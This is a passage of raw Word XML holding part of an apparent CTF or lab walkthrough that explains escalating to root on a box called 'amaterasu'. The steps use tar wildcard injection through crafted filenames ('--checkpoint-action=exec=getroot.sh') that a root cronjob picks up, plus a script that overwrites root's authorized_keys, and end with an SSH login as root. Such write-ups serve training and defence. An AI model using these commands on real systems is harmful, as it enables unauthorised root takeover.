    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /home/alfredo/.ssh/authorized_keys /root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the root's authorized_keys with theirs, letting them SSH in as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Setting up the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now they craft filenames that abuse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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These filenames are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> themselves. But when passed to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they are interpreted as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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--checkpoint=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells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to trigger an action every 1 record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells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to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on each checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because these "filenames" are part of the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wildcard in the tar command, they get executed as part of the root-run cronjob.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Letting the Cronjob Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They wait a few minutes for cron to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin/backup-flask.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When it runs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It includes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint=1</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--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>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interprets those as real options, not filenames, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:pict>
          <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. SSH in as Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that the root's authorized_keys file has been overwritten with alfredo's public key, the attacker can SSH as root without needing the root password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -p 25022 -i id_alfredo root@192.168.56.101</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They use the private key corresponding to the public key added earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once in, they have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root shell access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[root@amaterasu ~]# cat proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:pict>
          <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of Flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found a root cronjob running a script using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crafted malicious filenames (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint=1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--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) that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would interpret as options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Created </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to overwrite root's authorized_keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Waited for cron to run the backup script as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH'd in as root using the now-added public key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let me know if you'd like a diagram or want to test this in a lab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ti2o9p87ftwp" w:id="331"/>
      <w:bookmarkEnd w:id="331"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
